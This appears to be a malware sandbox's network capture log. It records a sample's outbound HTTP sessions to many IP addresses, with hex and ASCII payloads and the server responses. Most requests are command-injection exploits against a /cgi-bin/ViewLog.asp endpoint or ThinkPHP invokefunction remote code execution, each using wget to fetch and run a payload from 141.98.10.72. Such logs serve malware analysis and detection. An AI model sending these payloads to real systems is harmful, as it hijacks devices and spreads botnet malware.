                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /cgi-bin/ViewLog.asp</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.144550895.216.186.758080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.338407040 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:08.557955980 CET113INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:33:08 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.144366662.99.242.378080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.342633963 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:08.581837893 CET209INHTTP/1.1 401 Unauthorized
                                                        WWW-Authenticate: Basic realm="Zarafa CalDav Gateway"
                                                        Content-Length: 0
                                                        Server: Zarafa
                                                        Date: Wed, 14 Feb 2024 08:33:08 GMT
                                                        Connection: Keep-Alive
                                                        Keep-Alive: 300


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.145074231.200.85.2318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.364608049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.145841294.187.107.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.375099897 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.145341431.136.149.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.557619095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:09.224874973 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:10.568892002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:13.448827028 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.824527979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:29.576081991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:52.103241920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:35.109406948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.144281694.122.3.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:08.612325907 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.144155431.136.207.2508080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:09.335911036 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:12.424745083 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:18.568526030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:30.600090981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:56.199028969 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:45.349073887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.144999495.101.250.12580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.035747051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.235131025 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 32 33 64 35 30 31 63 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;c3f655f&#46;1707899590&#46;23d501c9</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.145979895.100.77.17680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.036755085 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.237472057 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 63 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 33 33 62 35 36 34 33 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;8c7a7b5c&#46;1707899590&#46;33b56439</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.145339095.111.239.20980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.043970108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.252242088 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.145735095.101.40.15380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.050705910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.265527964 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 35 39 30 26 23 34 36 3b 35 33 37 36 38 62 32 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9ec91002&#46;1707899590&#46;53768b21</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.145151295.197.231.18780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:10.063997984 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:10.297000885 CET49INHTTP/1.1 404 Site or Page Not Found
                                                        Feb 14, 2024 09:33:10.304908991 CET347INData Raw: 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 30 38 3a 33 32 3a 32 32 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 43 6f 6e 74 65 6e 74
                                                        Data Ascii: Date: Wed Feb 14 08:32:22 2024Pragma: no-cacheCache-Control: no-storeContent-Type: text/htmlX-Frame-Options: sameoriginX-XSS-Protection: 1; mode=block<html><head><title>Document Error: Site or Page Not Found</title></head><bo


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.145745895.252.118.22680
                                                        TimestampBytes transferredDirectionData
